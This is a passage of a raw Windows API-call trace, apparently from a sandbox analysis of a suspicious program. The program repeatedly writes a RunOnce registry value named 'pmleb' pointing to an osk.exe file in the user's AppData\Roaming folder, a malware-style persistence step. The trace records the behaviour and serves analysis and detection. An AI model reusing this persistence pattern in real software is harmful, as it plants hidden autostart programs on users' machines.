0x0 [0083.420] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.420] RegCloseKey (hKey=0x280) returned 0x0 [0083.420] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.420] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.420] SetTimer (hWnd=0x20280, nIDEvent=0x212f, uElapse=0xa, lpTimerFunc=0x0) returned 0x212f [0083.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0083.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.435] KillTimer (hWnd=0x20280, uIDEvent=0x212f) returned 1 [0083.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.436] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.436] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.436] RegCloseKey (hKey=0x280) returned 0x0 [0083.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.436] SetTimer (hWnd=0x20280, nIDEvent=0x2130, uElapse=0xa, lpTimerFunc=0x0) returned 0x2130 [0083.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.450] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.450] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.450] KillTimer (hWnd=0x20280, uIDEvent=0x2130) returned 1 [0083.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.451] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.451] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.451] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.451] RegCloseKey (hKey=0x280) returned 0x0 [0083.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.452] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.452] SetTimer (hWnd=0x20280, nIDEvent=0x2131, uElapse=0xa, lpTimerFunc=0x0) returned 0x2131 [0083.452] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.465] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.465] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.466] KillTimer (hWnd=0x20280, uIDEvent=0x2131) returned 1 [0083.466] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.466] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.466] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.467] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.467] RegCloseKey (hKey=0x280) returned 0x0 [0083.467] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.467] SetTimer (hWnd=0x20280, nIDEvent=0x2132, uElapse=0xa, lpTimerFunc=0x0) returned 0x2132 [0083.467] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.481] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.481] KillTimer (hWnd=0x20280, uIDEvent=0x2132) returned 1 [0083.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.482] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.482] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.482] RegCloseKey (hKey=0x280) returned 0x0 [0083.483] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.483] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.483] SetTimer (hWnd=0x20280, nIDEvent=0x2133, uElapse=0xa, lpTimerFunc=0x0) returned 0x2133 [0083.483] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.497] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.497] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.497] KillTimer (hWnd=0x20280, uIDEvent=0x2133) returned 1 [0083.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.498] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.498] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.498] RegCloseKey (hKey=0x280) returned 0x0 [0083.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.498] SetTimer (hWnd=0x20280, nIDEvent=0x2134, uElapse=0xa, lpTimerFunc=0x0) returned 0x2134 [0083.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.512] KillTimer (hWnd=0x20280, uIDEvent=0x2134) returned 1 [0083.513] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.514] RegCloseKey (hKey=0x280) returned 0x0 [0083.514] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.514] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.514] SetTimer (hWnd=0x20280, nIDEvent=0x2135, uElapse=0xa, lpTimerFunc=0x0) returned 0x2135 [0083.514] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.528] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.528] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.528] KillTimer (hWnd=0x20280, 
uIDEvent=0x2135) returned 1 [0083.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.529] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.529] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.529] RegCloseKey (hKey=0x280) returned 0x0 [0083.530] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.530] SetTimer (hWnd=0x20280, nIDEvent=0x2136, uElapse=0xa, lpTimerFunc=0x0) returned 0x2136 [0083.530] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.544] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.544] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.544] KillTimer (hWnd=0x20280, uIDEvent=0x2136) returned 1 [0083.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.545] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.545] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.545] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.545] RegCloseKey (hKey=0x280) returned 0x0 [0083.545] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.545] SetTimer (hWnd=0x20280, nIDEvent=0x2137, uElapse=0xa, lpTimerFunc=0x0) returned 0x2137 [0083.546] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.606] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.606] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.606] KillTimer (hWnd=0x20280, uIDEvent=0x2137) returned 1 [0083.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.607] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.607] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.607] RegCloseKey (hKey=0x280) returned 0x0 [0083.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.608] SetTimer (hWnd=0x20280, nIDEvent=0x2138, uElapse=0xa, lpTimerFunc=0x0) returned 0x2138 [0083.608] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.622] KillTimer (hWnd=0x20280, uIDEvent=0x2138) returned 1 [0083.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0083.622] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.622] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.623] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.623] RegCloseKey (hKey=0x280) returned 0x0 [0083.623] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.623] SetTimer (hWnd=0x20280, nIDEvent=0x2139, uElapse=0xa, lpTimerFunc=0x0) returned 0x2139 [0083.623] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.637] KillTimer (hWnd=0x20280, uIDEvent=0x2139) returned 1 [0083.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.638] RegCloseKey (hKey=0x280) returned 0x0 
[0083.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.638] SetTimer (hWnd=0x20280, nIDEvent=0x213a, uElapse=0xa, lpTimerFunc=0x0) returned 0x213a [0083.639] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.653] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.653] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.653] KillTimer (hWnd=0x20280, uIDEvent=0x213a) returned 1 [0083.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.654] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.654] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.654] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.654] RegCloseKey (hKey=0x280) returned 0x0 [0083.654] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.655] SetTimer (hWnd=0x20280, nIDEvent=0x213b, uElapse=0xa, lpTimerFunc=0x0) returned 0x213b [0083.655] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.668] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.668] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.668] KillTimer (hWnd=0x20280, uIDEvent=0x213b) returned 1 [0083.669] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.669] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.669] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.669] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.669] RegCloseKey (hKey=0x280) returned 0x0 [0083.669] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.670] SetTimer (hWnd=0x20280, nIDEvent=0x213c, uElapse=0xa, lpTimerFunc=0x0) returned 0x213c [0083.670] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.684] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.684] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.684] KillTimer (hWnd=0x20280, uIDEvent=0x213c) returned 1 [0083.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.685] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.685] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.685] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.685] RegCloseKey (hKey=0x280) returned 0x0 [0083.685] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.685] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.685] SetTimer (hWnd=0x20280, nIDEvent=0x213d, uElapse=0xa, lpTimerFunc=0x0) returned 0x213d [0083.685] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.700] KillTimer (hWnd=0x20280, uIDEvent=0x213d) returned 1 [0083.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.701] RegCloseKey (hKey=0x280) returned 0x0 [0083.701] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.701] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.701] SetTimer (hWnd=0x20280, nIDEvent=0x213e, uElapse=0xa, lpTimerFunc=0x0) returned 0x213e [0083.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.725] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.725] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.725] KillTimer (hWnd=0x20280, uIDEvent=0x213e) returned 1 [0083.726] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.726] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.726] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.726] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.727] RegCloseKey (hKey=0x280) returned 0x0 [0083.727] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.727] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.727] SetTimer (hWnd=0x20280, nIDEvent=0x213f, uElapse=0xa, lpTimerFunc=0x0) returned 0x213f [0083.727] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.731] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.731] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.731] KillTimer (hWnd=0x20280, uIDEvent=0x213f) returned 1 [0083.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.732] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.732] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.732] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.732] RegCloseKey (hKey=0x280) returned 0x0 [0083.732] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0083.732] SetTimer (hWnd=0x20280, nIDEvent=0x2140, uElapse=0xa, lpTimerFunc=0x0) returned 0x2140 [0083.732] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.746] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.746] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.746] KillTimer (hWnd=0x20280, uIDEvent=0x2140) returned 1 [0083.747] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.747] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.747] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.747] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.747] RegCloseKey (hKey=0x280) returned 0x0 [0083.748] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.748] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.748] SetTimer (hWnd=0x20280, nIDEvent=0x2141, uElapse=0xa, lpTimerFunc=0x0) returned 0x2141 [0083.748] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.762] TranslateMessage 